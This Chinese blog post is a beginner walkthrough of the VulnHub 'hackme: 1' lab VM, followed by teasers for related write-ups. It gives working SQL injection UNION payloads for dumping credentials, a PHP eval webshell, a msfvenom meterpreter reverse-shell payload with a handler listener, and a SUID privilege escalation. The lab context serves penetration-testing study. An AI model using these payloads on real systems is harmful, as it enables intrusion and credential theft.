hackme1新手教学

最新推荐文章于 2025-06-14 09:00:03 发布
原创 最新推荐文章于 2025-06-14 09:00:03 发布 · 1.5w 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #php #开发语言

靶机地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/

1.将靶机下载并导入到vm虚拟机当中,开启hackme1靶场。

2.打开kali虚拟机输入arp-scan -l 查看同一网段的所有IP,寻找靶机的IP地址,发现靶机IP为192.168.47.137

3.通过ifconfig查看kali的IP地址,此处kali作为攻击机。

4.通过masscan --rate=100000 -p 0-65535 192.168.47.137

对靶机进行端口扫描,发现开放80和22端口。

5.通过nmap -T4 -sV -O -p 22,80 192.168.47.137

对80和22端口进行nmap详细扫描查看端口的具体信息。

6.通过dirb http://192.168.47.137命令查看80端口的详细目录,发现目录为upload。

7.访问http://192.168.47.137

8.点击sign up now进行注册,并登录。

9.接下来查看是否有sql注入,点击search可以查看所有信息。

10.在查询框输入OSINT’and 1=1#发现有回显,说明存在注入。

11.输入order by 3#发现有回显,输入order by 4#没有回显,说明字段数为3.

12.输入-1' union select database(),2,3# ,查看数据库具体信息,得到数据库名称为webapphacking 。

13.输入-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#,查询数据库的所有表,得到数据库中存在books表和users表;猜测users表包含账户信息 。

14.输入-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#,查看user表中的所有列,发现有user和password,猜测账户密码很可能存在这两个列中。

15.输入-1' union select group_concat(user),group_concat(pasword),3 from users#,查看user和password的具体信息,发现用户名其中一个是superadmin,最有可能为管理员账户,得到用户名和密码,但是密码被md5加密。

16.对密码进行md5解密,推荐解密网站md5在线加密解密,得到解密结果为Uncrackable。

17.点击sign out of your account进行登录

18.接下里我们getshell,我们在桌面创建一句话木马的php格式文件,一句话木马为<?php eval(@$_POST['wjq']); ?>,点击选择文件进行上传,然后点击upload image。

19.根据页面提示文件上传至uploads中,所以一句话木马的路径为,192.168.47.137/uploads/1.php。

20.用蚁箭进行链接,可以查看后台文件,相当于拿到了服务器的部分权限

21.在kali中输入msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.47.130 lport=4444 -f elf >4444.elf,利用msfvenom生成攻击机的木马文件。

22.然后将生成的木马文件复制到本机win10桌面上传到中国蚁剑,之后只要服务器运行此文件,就会被监听。

23.在kali设置监听,输入代码

msfdb

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.47.137 #目标靶机IP

set lport 4444

explort

24.随后在中国蚁剑木马文件的目录下打开终端,设置木马文件的权限并运行文件(如果没有设置权限就会出现下图第一次运行文件时的情况:提示权限不足),输入chmod +x 4444.elf,提权,再运行4444.elf文件

25.运行后,在kali中会监听到服务器,此时获得服务器的shell。

26.切换到shell,输入whoami可查看具体信息

27.获取shell后切换到python终端,输入python -c 'import pty;pty.spawn("/bin/bash")'

28.输入cd home/legacy跳转到home/legacy目录下,ls发现 ./touchmenot文件

输入 ./touchmenot,运行获得root

w2411313
关注
(Vulnhub练习)-- HACKME: 1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
12-06 3806
(Vulnhub练习)-- HACKME: 1渗透实战 下载地址 https://www.vulnhub.com/entry/hackme-1,330/ 扫描主机 netdiscover -i eth0 -r 192.168.100.0/24 目标主机IP:192.168.100.134 信息收集 信息收集的步骤基本上差不多,可根据工具简单写个shell脚本 #!/usr/bin/bash ip=192.168.100.$1 ping -c2 $ip &>/dev/null
HACKME:1靶机
JKding123的博客
10-22 1162
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
Hackme1
追求卓越,技术流~
01-12 2303
文章目录前言一、搭建靶场环境二、实战2.1信息收集2.1.1网络扫描2.1.2查看靶机开放的端口22段口分析80端口分析2.2SQL注入2.2.1验证是否含有SQL注入漏洞2.2.2sqlmap注入攻击2.3文件上传漏洞2.4kali监听2.5权力提升总结 前言 学习网络安全技术,我认为:主要是在注重实战。 实践是检验真理的唯一标准 接下来主要围绕靶机的攻击进程来学习网络安全技术。 一、搭建靶场环境 攻击机kali: IP地址:192.168.247.129 靶机hackme1: IP地址:192.
Han1meViewer:探索Android视频播放新体验
最新发布
gitblog_00908的博客
06-14 2428
Han1meViewer:探索Android视频播放新体验 项目介绍 Han1meViewer 是一款功能强大的 Android 应用,旨在为用户提供流畅且丰富的视频播放体验。这款应用基于 Kotlin 开发,专注于播放和浏览 hanime 视频资源,其独特的布局切换、自定义播放内核和智能内容推荐等功能,使得观看视频成为一种享受。 项目技术分析 Han1meViewer 的技术架构体现了现代移动应...
靶机渗透 hackme-1(详解,适合新手
君莫hacker的博客
09-05 7254
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
hackme-1初级渗透测试
jrdh的博客
11-26 1857
Hackme-1环境搭建1. 详情2. 描述一:信息收集0x01主机发现端口扫描服务扫描服务器指纹信息查询网站目录爆破二:漏洞发现创建用户SQL注入MD5解密文件上传漏洞漏洞验证三:漏洞利用反弹shell法一: 一句话木马四:提权 环境搭建 测试机:kali:192.168.10.153 靶机:hackme-1192.168.10.155 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初
靶机渗透练习13-hackme1
hirak0的博客
04-15 739
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-1,330/ Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic
HACKME: 1实战演练
龙狼刺的博客
05-24 251
HACKME: 1
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 4444
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
vulnhub hackme: 1
箭雨镜屋
02-11 3167
nmap扫描----->dirb和nikto扫描----->利用SQL联合注入得到superadmin账号密码----->通过文件上传漏洞获得反弹shell----->通过奇怪目录下有suid权限的文件提权
Vulnhub-hackme1
GALi_233的博客
03-06 3471
Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment. ‘hackme’ uses DHCP and in the pos
【靶机渗透】HACKME: 1
weixin_47443077的博客
06-20 374
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 文章目录【靶机渗透】HACKME: 10x01靶机介绍1. 详情2. 描述0x02环境搭建1. 下载靶机2. 创建靶机3. 开启靶机0x03靶机渗透1. 主机发现2. 端口扫描3. 服务扫描4. web信息收集0x04漏洞利用1.SQL注入2.文件上传3.反弹shell4.提权 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1
hackme-1靶机
a666666688的博客
08-11 458
在它的根目录下写一个2.txt.将抓到的包的内容写入txt文件中。MD5属于不可逆加密,所以有可能解密失败,但此处可以破解。
Vulnhub靶机:hackme1
qq_48904485的博客
01-30 480
运行环境:Virtualbox(攻击机)和VMware(靶机)攻击机:kali(192.168.56.106)靶机:hackme1192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hackme-1,330/
.hackme靶机通关攻略
2301_81525518的博客
09-03 301
上传一句话木马 <?> 写入1.php上传后去看它的目录里边有没有。有就说明写进去了然后去连接webshell。可以看到密码是加密后的拿到密码进行解密。(这里我用的superadmin用户)回去登录进去看见有个上传文件的地方。只有一个框框那就来试试sql注入。这里查看users表的用户和密码。通过御剑扫描到IP进入尝试。进来点一下提交出来书名。
hackme-1靶机渗透详解
大熊
06-12 834
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
Hackme_1靶机渗透 (新手推荐)主要考点SQL注入,文件上传
m0_64429364的博客
09-19 466
hackme_1详细解释
Vulnhub靶机hackme: 1 writeup
xingjinhao123的博客
01-14 2381
下载地址:https://www.vulnhub.com/entry/hackme-1,330/ 信息搜集 获取IP地址 扫描端口 80端口 首页是一个登录页面 发现有注册页面,注册一个账号admin:password,并且登录成功 登录成功之后的页面,是一个查阅图书的页面 尝试使用SQL注入 sqlmap -r sqlmap.txt --batch sqlmap.txt里面的内容,通过抓包获取的 sqlmap.txt POST /welcome.php HTTP/1.1 Host:
vulhub靶场学习日记hackme1
m0_55763479的博客
07-10 732
vulhub靶场学习日记hackme1
hackme靶机通关
12-27
### 关于 HackMe 靶机通关攻略 #### 利用 Web 应用程序中的 SQL 注入漏洞获取数据库信息 SQL注入是一种常见的Web应用程序安全漏洞,允许攻击者执行任意SQL查询。对于`hackme2`靶场而言,在存在SQL注入的地方可以尝试使用特定的payload来枚举表名[^4]。 ```sql -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' # ``` 此语句将返回名为 `webapphacking` 的数据库下的所有表格名称列表,这有助于进一步了解应用结构并发现潜在的目标数据存储位置。 #### 发现并利用文件上传功能实现远程代码执行 某些情况下,Web应用程序可能提供文件上传的功能。如果这种机制缺乏足够的验证措施,则可能会被用来上载恶意脚本文件(如PHP木马)。一旦成功上传了一句话木马到服务器端,就可以通过向其发送命令请求来进行后续操作[^5]。 ```php <?php phpinfo(); eval($_POST['cmd']); ?> ``` 这段简单的PHP代码片段定义了一个后门接口,它会响应来自客户端提交的数据包中携带的指令参数(`cmd`),从而实现了远程控制的能力。为了定位已上传的一句话木马的确切路径,通常还需要借助目录遍历技术找到对应的URL地址[^3]。 #### 权限提升至超级用户级别 当获得了初步的访问权限之后,下一步便是寻找能够帮助提权的信息配置错误之处。例如,可以通过查找管理员账户凭证者其他敏感资源来完成这一过程。最终目的是以更高的特权状态运行命令,进而完全掌控整个系统环境[^1]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值